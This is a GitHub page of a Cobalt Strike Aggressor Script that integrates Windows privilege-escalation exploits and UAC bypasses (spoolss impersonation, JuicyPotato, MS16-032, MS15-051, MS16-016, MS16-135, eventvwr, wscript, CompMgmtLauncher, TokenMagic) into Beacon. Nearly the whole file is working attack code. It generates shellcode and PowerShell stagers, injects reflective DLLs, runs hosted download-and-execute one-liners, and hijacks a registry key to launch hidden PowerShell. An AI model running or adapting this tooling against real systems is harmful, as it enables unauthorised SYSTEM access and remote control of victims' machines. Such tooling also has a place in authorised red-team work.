-
Notifications
You must be signed in to change notification settings - Fork 26
/
elevate.cna
332 lines (245 loc) · 10.8 KB
/
elevate.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
#
# Integrate several privilege escalation exploits into Cobalt Strike via Aggressor Script
#
# Integrate ms16-032
# Sourced from Empire: https://github.com/adaptivethreat/Empire/tree/master/data/module_source/privesc
import common.CommonUtils;
import beacon.CommandBuilder;
import common.ReflectiveDLL;
# https://github.com/nccgroup/nccfsas
sub SpoolTrigger {
local('$bid $pipename $spawn $offset $padding $patched $dllbytes $file $builder $pid $pipenameW');
$bid = $1;
$pipename = $2;
$method = $3;
if ($method eq "spawn") {
# this is to avoid cross-arch injection where possible
if(binfo($bid, 'barch') eq 'x64') {
bdllspawn($1, script_resource("elevate/SpoolTrigger.x64.dll"), $pipename, "spooltrigger", 5000, true);
}
else {
bdllspawn($1, script_resource("elevate/SpoolTrigger.x86.dll"), $pipename, "spooltrigger", 5000, true);
}
}
else {
# patch and self-inject..
# first we need to patch up our arguments
# we use internal APIs since bdllinject wants a filepath not bytes
if(binfo($bid, 'barch') eq 'x64') {
$file = script_resource("elevate/SpoolTrigger.x64.dll");
}
else {
$file = script_resource("elevate/SpoolTrigger.x86.dll");
}
$dllbytes = [CommonUtils readFile: $file];
$padding = [CommonUtils garbage: "PATCHME"];
$patched = [CommonUtils patch: $dllbytes, "PATCHME", $padding . $pipename];
$offset = [ReflectiveDLL findReflectiveLoader: $dllbytes];
if($offset <= 0) {
berror($1, "Could not find ReflectiveLoader");
return;
}
$pid = binfo($bid, 'pid');
blog($bid, "Injecting spooltrigger into PID: " . $pid);
$builder = [new CommandBuilder];
if ([ReflectiveDLL is64: $dllbytes]) {
[$builder setCommand: 43];
} else {
[$builder setCommand: 9];
}
[$builder addInteger: parseNumber($pid)];
[$builder addInteger: $offset];
[$builder addString: [CommonUtils bString: $patched]];
call("beacons.task", $null, $bid, cast([$builder build], 'b'));
}
}
sub SpoolSystem {
local('$mypipe $pipename $builder')
# needed for ImpersonateNamedPipeClient
btask($1, "Tasked beacon to get SYSTEM via spoolss", "T1134");
bgetprivs($1, "SeImpersonatePrivilege");
# fire up a named pipe
$mypipe = [CommonUtils garbage: "spooltrigger"];
$pipename = "\\\\.\\pipe\\" . $mypipe . "\\pipe\\spoolss";
$builder = [new CommandBuilder];
[$builder setCommand: 60];
[$builder addString: $pipename];
call("beacons.task", $null, $1, cast([$builder build], 'b'));
# trigger spoolss
SpoolTrigger($1, $mypipe, $2);
# impersonate the named pipe client
[$builder setCommand: 61];
call("beacons.task", $null, $1, cast([$builder build], 'b'));
}
beacon_command_register("spoolsystem", "Gets SYSTEM via spoolss",
"Uses named pipe impersonation to gain SYSTEM via Print Spooler.\n\n" .
"Use: spoolsystem <method>\n\n" .
"Example: spoolsystem inject\n" .
"Example: spoolsystem spawn" );
alias spoolsystem {
local('$args');
$args = substr($0, strlen("spoolsystem "));
if ($args eq "") {
berror($1, "Please specify an execution method.");
return;
}
SpoolSystem($1, $args);
}
#############################################################################
sub juicypotato {
btask($1, "Task Beacon to run " . listener_describe($2) . " via JuicyPotato (ms16-075)");
if (-is64 $1)
{
$arch = "x64";
$dll = "elevate/reflectiveJuicyPotato/JuicyPotato.x64.dll";
} else {
$arch = "x86";
$dll = "elevate/reflectiveJuicyPotato/JuicyPotato.x32.dll";
}
$stager = shellcode($2, false, $arch);
bdllspawn!($1, script_resource($dll), $stager, "NTLM DCOM->RPC NTLM Reflection (MS16-075)", 5000);
bstage($1, $null, $2, $arch);
}
beacon_exploit_register("juicypotato", "JuicyPotato (ms16-075)", &juicypotato);
#####################################################################
sub ms16_032_exploit {
local('$script $oneliner');
# acknowledge this command
btask($1, "Tasked Beacon to run " . listener_describe($2) . " via ms16-032", "T1068");
# generate a PowerShell script to run our Beacon listener
$script = artifact($2, "powershell");
# host this script within this Beacon
$oneliner = beacon_host_script($1, $script);
# task Beacon to run this exploit with our one-liner that runs Beacon
bpowershell_import!($1, getFileProper(script_resource("elevate"), "Invoke-MS16032.ps1"));
bpowerpick!($1, "Invoke-MS16032 -Command \" $+ $oneliner $+ \"");
# give it another 10s to work.
bpause($1, 10000);
# handle staging
bstage($1, $null, $2);
}
beacon_exploit_register("ms16-032", "Secondary Logon Handle Privilege Escalation (CVE-2016-099)", &ms16_032_exploit);
# Integrate Matt Nelson's file-less eventvwr.exe Bypass UAC attack
# Sourced from Empire: https://github.com/adaptivethreat/Empire/tree/master/data/module_source/privesc
sub eventvwr_exploit {
# acknowledge this command
btask($1, "Tasked Beacon to run " . listener_describe($2) . " in a high integrity context", "T1088");
# generate a PowerShell script to run our Beacon listener
$script = artifact($2, "powershell");
# host this script within this Beacon
$oneliner = powershell_encode_oneliner( beacon_host_script($1, $script) );
# task Beacon to run this exploit with our one-liner that runs Beacon
bpowershell_import!($1, getFileProper(script_resource("elevate"), "Invoke-EventVwrBypass.ps1"));
bpowerpick!($1, "Invoke-EventVwrBypass -Command \" $+ $oneliner $+ \"");
# handle staging
bstage($1, $null, $2);
}
beacon_exploit_register("uac-eventvwr", "Bypass UAC with eventvwr.exe", &eventvwr_exploit);
# Integrate wscript.exe Bypass UAC attack
# Sourced from Empire: https://github.com/adaptivethreat/Empire/tree/master/data/module_source/privesc
sub wscript_exploit {
# acknowledge this command
btask($1, "Tasked Beacon to run " . listener_describe($2) . " in a high integrity context", "T1088");
# generate a PowerShell script to run our Beacon listener
$script = artifact($2, "powershell");
# host this script within this Beacon
$oneliner = powershell_encode_oneliner( beacon_host_script($1, $script) );
# task Beacon to run this exploit with our one-liner that runs Beacon
bpowershell_import!($1, getFileProper(script_resource("elevate"), "Invoke-WScriptBypassUAC.ps1"));
bpowerpick!($1, "Invoke-WScriptBypassUAC -payload \" $+ $oneliner $+ \"");
# handle staging
bstage($1, $null, $2);
}
beacon_exploit_register("uac-wscript", "Bypass UAC with wscript.exe", &wscript_exploit);
# Integrate windows/local/ms15_051_client_copy_image from Metasploit
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms15_051_client_copy_image.rb
sub ms15_051_exploit {
# acknowledge this command
btask($1, "Task Beacon to run " . listener_describe($2) . " via ms15-051", "T1068");
# tune our parameters based on the target arch
if (-is64 $1) {
$arch = "x64";
$dll = getFileProper(script_resource("elevate"), "cve-2015-1701.x64.dll");
}
else {
$arch = "x86";
$dll = getFileProper(script_resource("elevate"), "cve-2015-1701.x86.dll");
}
# generate our shellcode
$stager = shellcode($2, false, $arch);
# make sure we have shellcode for this listener (some stagers are x86 only)
if ($stager is $null) {
berror($1, "No $arch stager for listener ' $+ $2 $+ '");
return;
}
# spawn a Beacon post-ex job with the exploit DLL
bdllspawn!($1, $dll, $stager, "ms15-051", 5000);
# stage our payload (if this is a bind payload)
bstage($1, $null, $2, $arch);
}
beacon_exploit_register("ms15-051", "Windows ClientCopyImage Win32k Exploit (CVE 2015-1701)", &ms15_051_exploit);
# Integrate windows/local/ms16_016_webdav from Metasploit
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms16_016_webdav.rb
sub ms16_016_exploit {
# check if we're on an x64 system and error out.
if (-is64 $1) {
berror($1, "ms16-016 exploit is x86 only");
return;
}
# acknowledge this command
btask($1, "Task Beacon to run " . listener_describe($2) . " via ms16-016", "T1068");
# generate our shellcode
$stager = shellcode($2, false, "x86");
# spawn a Beacon post-ex job with the exploit DLL
bdllspawn!($1, getFileProper(script_resource("elevate"), "cve-2016-0051.x86.dll"), $stager, "ms16-016", 5000);
# stage our payload (if this is a bind payload)
bstage($1, $null, $2, $arch);
}
beacon_exploit_register("ms16-016", "mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051)", &ms16_016_exploit);
sub ms16_135 {
local('$script $oneliner');
btask($1, "Tasked Beacon to run " . listener_describe($2) . " via MS16-135");
# Generate PowerShell
$script = artifact($2, "powershell");
# Host script
$oneliner = beacon_host_script($1, $script);
# Source
$source = getFileProper(script_resource("elevate"), "Invoke-MS16135.ps1");
# Import & run
bpowershell_import!($1, $source);
bpowerpick!($1, "Invoke-MS16135 -Command \" $+ $oneliner $+ \"");
# Wait
bpause($1, 10000);
# Stage
bstage($1, $null, $2);
}
beacon_exploit_register("ms16-135", "Win32k Elevation of Privilege (CVE-2016-7255)", &ms16_135);
sub compMgmtLauncher_exploit {
btask($1, "Task Beacon to run " . listener_describe($2) . " in a high-integrity context.");
$script = artifact($2, "powershell");
$oneliner = beacon_host_script($1, $script);
$oneliner = strrep($oneliner, "IEX ", "");
$cmd = "reg add HKEY_CURRENT_USER\\Software\\Classes\\mscfile\\shell\\open\\command /d \"";
$cmd .= "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden iex -c " . $oneliner . "\" /f";
bshell($1, $cmd);
bcd($1, "C:\\Windows\\System32");
bpowerpick($1, ".\\CompMgmtLauncher.exe");
bshell($1, "reg delete HKEY_CURRENT_USER\\Software\\Classes\\mscfile /f");
}
beacon_exploit_register("compmgmt", "CompMgmtLauncher UAC bypass", &compMgmtLauncher_exploit);
# Integrate FuzzySecurity's UAC-TokenMagic.ps1 UAC Bypass
# https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1
sub tokenmagic_exploit {
# acknowledge this command
btask($1, "Tasked Beacon to run " . listener_describe($2) . " in a high integrity context");
# generate a PowerShell payload
$script = artifact($2, "powershell");
# host script within this Beacon
$oneliner = powershell_encode_oneliner(beacon_host_script($1, $script));
# run the exploit
bpowershell_import!($1, getFileProper(script_resource("elevate"), "UAC-TokenMagic.ps1"));
bpowerpick!($1, 'UAC-TokenMagic -BinPath C:\Windows\System32\cmd.exe -Args "/c ' . $oneliner . '"');
# handle staging
bstage($1, $null, $2);
}
beacon_exploit_register("uac-tokenmagic", "Bypass UAC with token magic.", &tokenmagic_exploit);